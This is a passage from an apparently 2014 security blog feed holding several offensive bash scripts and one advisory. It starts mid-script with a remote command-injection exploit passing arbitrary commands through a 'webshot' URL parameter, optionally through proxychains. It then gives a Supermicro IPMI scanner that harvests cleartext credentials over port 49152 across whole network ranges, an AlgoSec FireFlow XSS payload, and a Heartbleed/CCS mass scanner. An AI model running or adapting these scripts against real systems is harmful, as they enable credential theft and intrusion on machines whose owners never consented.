Sent! Check the local system for /tmp/a.txt..."<br /> else<br /> # RUN CUSTOM COMMAND<br /> echo "(--==== Sending exploit request to: "$TARGET<br /> echo '(--==== GET http://'$TARGET$BASE_PATH'?webshot=1&src=http://'$TARGET'/$('$COMMAND')'<br /> proxychains curl 'http://'$TARGET$BASE_PATH'?webshot=1&src=http://'$TARGET'/$('$COMMAND')' | grep version<br /> echo "(--==== Exploit Sent!"<br /> fi<br /> exit<br /><br />else <br /># NO PROXY<br /> echo "(--==== Scanning via direct connection..."<br /><br /> if [ -z $COMMAND ]; then<br /> # RUN DEFAULT COMMAND (ie. touch /tmp/a.txt)<br /> echo "(--==== Sending exploit request to: "$TARGET<br /> echo '(--==== GET http://'$TARGET$BASE_PATH'?webshot=1&src=http://'$TARGET'/$(touch$IFS/tmp/a.txt)'<br /> curl 'http://'$TARGET$BASE_PATH'?webshot=1&src=http://'$TARGET'/$(touch$IFS/tmp/a.txt)' | grep version<br /> echo "(--==== Exploit Sent! Check the local system for /tmp/a.txt..."<br /> else<br /> # RUN CUSTOM COMMAND<br /> echo "(--==== Sending exploit request to: "$TARGET<br /> echo '(--==== GET http://'$TARGET$BASE_PATH'?webshot=1&src=http://'$TARGET'/$('$COMMAND')'<br /> curl 'http://'$TARGET$BASE_PATH'?webshot=1&src=http://'$TARGET'/$('$COMMAND')' | grep version<br /> echo "(--==== Exploit Sent!"<br /> fi<br /> exit<br />fi<br /><br />echo ""<br />echo "(--==== Scan Complete!"<br />exit Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-3352537640011430393.post-29523386465648247382014-06-21T16:29:00.003-07:002014-06-24T17:16:47.259-07:00Supermicro IPMI/BMC Cleartext Password Scanner<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirofaHyXncIFESrF7DC_dwf1u5mclN-MfAAy8RjmaiCU2nSqunkE8OFZb0e0byIc9Z2Q61ih2QLTCwwOzvs7zKdLcII74dL56aR6TArjmKXqLxsevbPBBHASPfKEaEHHKsuMYEPIEAbhFS/s1600/supermicro.png" huzso16469418165383905990821860839="true" imageanchor="1" style="margin-left: 1em; margin-right: 1em;" wkddl150497890723361269479803976080="true" zeacktj322810314364297069701741737613="true"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirofaHyXncIFESrF7DC_dwf1u5mclN-MfAAy8RjmaiCU2nSqunkE8OFZb0e0byIc9Z2Q61ih2QLTCwwOzvs7zKdLcII74dL56aR6TArjmKXqLxsevbPBBHASPfKEaEHHKsuMYEPIEAbhFS/s1600/supermicro.png" height="306" width="400" /></a></div>
<br />
#!/bin/bash<br />
# Supermicro IPMI/BMC Cleartext Password Scanner v20140622 by 1N3<br />
# http://treadstonesecurity.blogspot.ca<br />
# Usage: sh supermicro_scan.sh <CIDR|IP|showdan> [proxy]<br />
#<br />
# ABOUT:<br />
# Supermicro’s implementation of IPMI/BMC allows remote, unauthenticated attackers to <br />
# request the file PSBlock via port 49152. This plain text password file contains IPMI <br />
# username and password information. This script allows users to scan their networks<br />
# check for vulnerable systems that require patching. <br />
#<br />
# USAGE: <br />
# ./supermicro_scan.sh 74.200.8.237 - Single host scan<br />
# ./supermicro_scan.sh 74.200.0.0/16 proxy - Subnet scan with proxy<br />
# ./supermicro_scan.sh showdan - Search for vulnerable servers on ShowdanHQ<br />
#<br />
<br />
clear<br />
echo "(--==== http://treadstonesecurity.blogspot.ca"<br />
echo "(--==== Supermicro IPMI Cleartext Password Scanner by 1N3"<br />
echo ""<br />
<br />
UNICORNSCAN=`which unicornscan`<br />
CURL=`which curl`<br />
PROXYCHAINS=`which proxychains`<br />
TARGET=$1<br />
PROXY=$2<br />
<br />
if [ "$UNICORNSCAN" == "" ]; then<br />
echo "(--==== Unicornscan not installed! Exiting..."<br />
exit<br />
fi<br />
<br />
if [ "$PROXYCHAINS" == "" ]; then<br />
echo "(--==== Proxychains not installed! Continuing scan without proxy support..."<br />
exit<br />
fi<br />
<br />
if [ "$CURL" == "" ]; then<br />
echo "(--==== Curl not installed! Exiting..."<br />
exit<br />
fi<br />
<br />
if [ -z "$1" ]; then<br />
echo "(--==== Usage: $0 <CIDR|IP> [proxy]"<br />
exit<br />
fi<br />
<br />
if [ $TARGET == "shodan" ]; then<br />
# SCAN USING SHODANHQ SEARCH<br />
echo "Searching ShowdanHQ..."<br />
iceweasel http://www.shodanhq.com/search?q=Content-Length%3D3269 &<br />
exit<br />
fi<br />
<br />
if [ "$PROXY" = "proxy" ]; then<br />
#PROXY ENABLED<br />
echo "(--==== Scanning via proxy..."<br />
# SCAN FOR THE DEFAULT FILES AND PORTS<br />
for a in `unicornscan -p 49152 $TARGET 2>/dev/null | awk '{print $5}'`; do <br />
echo "(--==== Extracting User/Pass from $a"<br />
echo "(--==== Sending GET http://$a:49152/PSBlock"<br />
proxychains curl http://$a:49152/PSBlock -m 3 --retry 1 -f -# | strings<br />
done<br />
exit<br />
<br />
else <br />
# NO PROXY<br />
echo "(--==== Scanning via direct connection..."<br />
# SCAN FOR THE DEFAULT FILES AND PORTS<br />
for a in `unicornscan -p 49152 $TARGET 2>/dev/null | awk '{print $5}'`; do <br />
echo "(--==== Extracting User/Pass from $a"<br />
echo "(--==== Sending GET http://$a:49152/PSBlock"<br />
curl http://$a:49152/PSBlock -m 3 --retry 1 -f -# | strings<br />
done<br />
exit<br />
<br />
fi<br />
<br />
echo ""<br />
echo "(--==== Scan Complete!"<br />
exit Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3352537640011430393.post-68129954009361978062014-06-09T09:13:00.002-07:002014-06-24T17:17:26.369-07:00AlogoSec FireFlow v6.3 XSS/HTML Injection Flaws<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Arial,Helvetica,sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2yc2YAHoUYDFUGr3SjRLl9L0aZBLc6tkraXeB8f0uIxTqKh2GJ4hZqEgLKKqbi4IzOXxLFbFqbqs0jDi8v0h1aRUcjK2uQFzpTJwGKuowyET7vSjsgYVApcnKCTthkVuPGLFR6V6xTEoR/s1600/FireFlowXSS2c.png" huzso16469418165383905990821860839="true" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2yc2YAHoUYDFUGr3SjRLl9L0aZBLc6tkraXeB8f0uIxTqKh2GJ4hZqEgLKKqbi4IzOXxLFbFqbqs0jDi8v0h1aRUcjK2uQFzpTJwGKuowyET7vSjsgYVApcnKCTthkVuPGLFR6V6xTEoR/s1600/FireFlowXSS2c.png" height="193" width="400" /></a></span></div>
<div dir="ltr" id="docs-internal-guid-4cd16b05-8165-1aaa-f73a-df61899e620e" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
x---==== Exploit Title: AlogoSec FireFlow v6.3 XSS/HTML Injection Flaws<br />
x---==== Date: Mon Jun 9 2014<br />
x---==== Author: 1N3<br />
x---==== Homepage: <a href="http://treadstonesecurity.blogspot.ca/" huzso16469418165383905990821860839="true">http://treadstonesecurity.blogspot.ca</a><br />
x---==== Software Link: <a href="http://www.algosec.com/en/products_solutions/products/fireflow" huzso16469418165383905990821860839="true">http://www.algosec.com/en/products_solutions/products/fireflow</a> <br />
x---==== Version: 6.3 (Other versions may also be susceptible)<br />
<br />
x---==== Vulnerability<br />
Form fields in the user preferences screen in AlgoSec FireFlow v6.3-b230 are vulnerable to reflective XSS and HTML injection attacks. This may allow attackers to automatically execute arbitrary javascript on behalf of other logged in users on the system by substituting XSS code in their signature. <br />
<br />
x---==== Vulnerable URL: <br />
<a href="https://fireflowhostname.com/FireFlow/SelfService/Prefs.html" huzso16469418165383905990821860839="true">https://fireflowhostname.com/FireFlow/SelfService/Prefs.html</a><br />
<br />
x---==== XSS Code: <br />
<script>alert(document.cookie)</script>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3352537640011430393.post-51152552845891561182014-06-06T12:53:00.001-07:002014-06-24T17:18:02.116-07:00OpenSSL CCS & HeartBleed Mass Scanner<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhp8GgqswHUrqtk2LitgSUmxQGa9rTIHuhdWzuFS3LjiMEECNWj3DfCLZEk0lM1VPqTtwPDj1C-B8g1pnV0tWS3y9SPZla3M82WDos6hALchyphenhyphenFZ4ccrwFeX_zvwq8vUNAiSPt1sYxy1FlYw/s1600/openssl.jpg" huzso16469418165383905990821860839="true" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhp8GgqswHUrqtk2LitgSUmxQGa9rTIHuhdWzuFS3LjiMEECNWj3DfCLZEk0lM1VPqTtwPDj1C-B8g1pnV0tWS3y9SPZla3M82WDos6hALchyphenhyphenFZ4ccrwFeX_zvwq8vUNAiSPt1sYxy1FlYw/s1600/openssl.jpg" /></a></div>
<br />
#!/bin/bash<br />
# MassBleed OpenSSL Scanner v20140609 by 1N3<br />
# http://treadstonesecurity.blogspot.ca<br />
# Usage: sh massbleed.sh <CIDR|IP> <single|port|subnet> [port] [proxy]<br />
#<br />
# ABOUT:<br />
# This script has four main functions with the ability to proxy all connections:<br />
# 1. To mass scan any CIDR range for OpenSSL vulnerabilities via port 443/tcp (https) (example: sh massbleed.sh 192.168.0.0/16)<br />
# 2. To scan any CIDR range for OpenSSL vulnerabilities via any custom port specified (example: sh massbleed.sh 192.168.0.0/16 port 8443)<br />
# 3. To individual scan every port (1-10000) on a single system for vulnerable versions of OpenSSL (example: sh massbleed.sh 127.0.0.1 single)<br />
# 4. To scan every open port on every host in a single class C subnet for OpenSSL vulnerabilities (example: sh massbleed.sh 192.168.0. subnet)<br />
#<br />
# PROXY: A proxy option has been added to scan via proxychains. You'll need to configure /etc/proxychains.conf for this to work. <br />
#<br />
# PROXY USAGE EXAMPLES:<br />
# (example: sh massbleed.sh 192.168.0.0/16 0 0 proxy)<br />
# (example: sh massbleed.sh 192.168.0.0/16 port 8443 proxy)<br />
# (example: sh massbleed.sh 127.0.0.1 single 0 proxy)<br />
# (example: sh massbleed.sh 192.168.0. subnet 0 proxy)<br />
#<br />
# VULNERABILITIES:<br />
# 1. OpenSSL HeartBleed Vulnerability (CVE-2014-0160)<br />
# 2. OpenSSL CCS (MITM) Vulnerability (CVE-2014-0224)<br />
#<br />
# REQUIREMENTS:<br />
# Is the heartbleed POC present? <br />
# Is the openssl CCS script present?<br />
# Is unicornscan installed?<br />
# Is nmap installed?<br />
<br />
echo "(--==== http://treadstonesecurity.blogspot.ca"<br />
echo "(--==== MassBleed OpenSSL Scanner by 1N3"<br />
echo ""<br />
<br />
HEARTBLEED=`ls heartbleed.py`<br />
OPENSSL_CCS=`ls openssl_ccs.pl`<br />
UNICORNSCAN=`which unicornscan`<br />
NMAP=`which nmap`<br />
RANGE=$1<br />
SCAN_TYPE=$2<br />
CUSTOM_PORT=$3<br />
PROXY=$4<br />
PORT_RANGE="1-65000"<br />
<br />
if [ "$HEARTBLEED" != "heartbleed.py" ]; then<br />
echo "(--==== heartbleed.py not found!"<br />
echo "(--==== To fix, download the POC by Jared Stafford (https://gist.github.com/sh1n0b1/10100394) and place in same directory named: heartbleed.py"<br />
exit<br />
fi<br />
<br />
if [ "$OPENSSL_CCS" != "openssl_ccs.pl" ]; then<br />
echo "(--==== openssl_ccs.pl not found!"<br />
echo "(--==== To fix, download the script from RedHat (https://access.redhat.com/labs/ccsinjectiontest/) and place in same directory named: openssl_ccs.pl"<br />
exit<br />
fi<br />
<br />
if [ "$UNICORNSCAN" == "" ]; then<br />
echo "(--==== Unicornscan not installed! Exiting..."<br />
exit<br />
fi<br />
<br />
if [ "$NMAP" == "" ]; then<br />
echo "(--==== Nmap not installed! Exiting..."<br />
exit<br />
fi<br />
<br />
if [ -z "$1" ]; then<br />
echo "(--==== Usage: $0 <CIDR|IP> <single|port|subnet> [port] [proxy]"<br />
exit<br />
fi<br />
<br />
if [ "$PROXY" = "proxy" ]; then<br />
echo "(--==== Scanning via proxy..."<br />
if [ "$SCAN_TYPE" = "single" ]; then<br />
if [ "$CUSTOM_PORT" != "0" ]; then<br />
echo "(--==== Checking HeartBleed: $RANGE:$CUSTOM_PORT" && proxychains python heartbleed.py $RANGE -p $CUSTOM_PORT | grep vulnerable<br />
echo "(--==== Checking OpenSSL CCS: $RANGE:$CUSTOM_PORT" && proxychains perl openssl_ccs.pl $RANGE $CUSTOM_PORT | grep affected;<br />
else<br />
for a in `proxychains unicornscan $RANGE -p $PORT_RANGE | awk '{print $4}' | cut -d']' -f1`; <br />
do <br />
echo "(--==== Checking HeartBleed $RANGE:"$a && proxychains python heartbleed.py $RANGE -p $a | grep vulnerable <br />
echo "(--==== Checking OpenSSL CCS $RANGE:"$a && proxychains perl openssl_ccs.pl $RANGE $a | grep affected;<br />
done;<br />
fi<br />
fi<br />
if [ "$SCAN_TYPE" = "subnet" ]; then<br />
for a in {1..254}; <br />
do <br />
echo "(--==== Scanning: $RANGE$a"<br />
for b in `proxychains unicornscan "$RANGE$a" -mT -r500 | awk '{print $4}' | cut -d']' -f1`;<br />
do <br />
echo "(--==== $RANGE$a:$b"<br />
echo "(--==== Checking HeartBleed:" && proxychains python heartbleed.py $RANGE$a -p $b | grep vulnerable <br />
echo "(--==== Checking OpenSSL CCS:" && proxychains perl heartbleed.py $RANGE$a $b | grep affected <br />
done;<br />
done;<br />
fi<br />
if [ "$SCAN_TYPE" = "port" ]; then<br />
for a in `proxychains unicornscan $RANGE -p $CUSTOM_PORT | awk '{print $6}'`; <br />
do <br />
echo "(--==== Checking HeartBleed:" $a:$CUSTOM_PORT && proxychains python heartbleed.py $a -p $CUSTOM_PORT | grep vulnerable <br />
echo "(--==== Checking OpenSSL CCS:" $a:$CUSTOM_PORT && proxychains perl openssl_ccs.pl $a $CUSTOM_PORT | grep affected <br />
done;<br />
else <br />
for a in `proxychains unicornscan $RANGE -p 443 | awk '{print $6}'`; <br />
do <br />
echo "(--==== Checking HeartBleed:" $a && proxychains python heartbleed.py $a -p 443 | grep vulnerable <br />
echo "(--==== Checking OpenSSL CCS:" $a && proxychains perl openssl_ccs.pl $a 443 | grep affected <br />
done<br />
fi<br />
else <br />
if [ "$SCAN_TYPE" = "single" ]; then<br />
for a in `unicornscan $RANGE -p $PORT_RANGE | awk '{print $4}' | cut -d']' -f1`; <br />
do <br />
echo "(--==== Checking HeartBleed $RANGE:"$a && python heartbleed.py $RANGE -p $a | grep vulnerable <br />
echo "(--==== Checking OpenSSL CCS $RANGE:"$a && perl openssl_ccs.pl $RANGE $a | grep affected <br />
done;<br />
fi<br />
if [ "$SCAN_TYPE" = "subnet" ]; then<br />
for a in {1..254}; <br />
do <br />
echo "(--==== Scanning: $RANGE$a"<br />
for b in `unicornscan "$RANGE$a" -mT -r500 | awk '{print $4}' | cut -d']' -f1`;<br />
do <br />
echo "$RANGE$a:$b"<br />
echo "(--==== Checking HeartBleed:" && python heartbleed.py $RANGE$a -p $b | grep vulnerable <br />
echo "(--==== Checking OpenSSL CCS:" && perl openssl_ccs.pl $RANGE$a $b | grep affected <br />
done;<br />
done;<br />
fi<br />
if [ "$SCAN_TYPE" = "port" ]; then<br />
for a in `unicornscan $RANGE -p $CUSTOM_PORT | awk '{print $6}'`; <br />
do <br />
echo "(--==== Checking HeartBleed:" $a:$CUSTOM_PORT && python heartbleed.py $a -p $CUSTOM_PORT | grep vulnerable <br />
echo "(--==== Checking OpenSSL CCS:" $a:$CUSTOM_PORT && perl openssl_ccs.pl $a $CUSTOM_PORT | grep affected <br />
done;<br />
else <br />
for a in `unicornscan $RANGE -p 443 | awk '{print $6}'`; <br />
do <br />
echo "(--==== Checking HeartBleed:" $a && python heartbleed.py $a -p 443 | grep vulnerable <br />
echo "(--==== Checking OpenSSL CCS:" $a && perl openssl_ccs.pl $a 443 | grep affected <br />
done<br />
fi<br />
fi<br />
<br />
echo "(--==== Scan Complete!"<br />
exit <br />
<div>
<br /></div>
Unknownnoreply@blogger.com0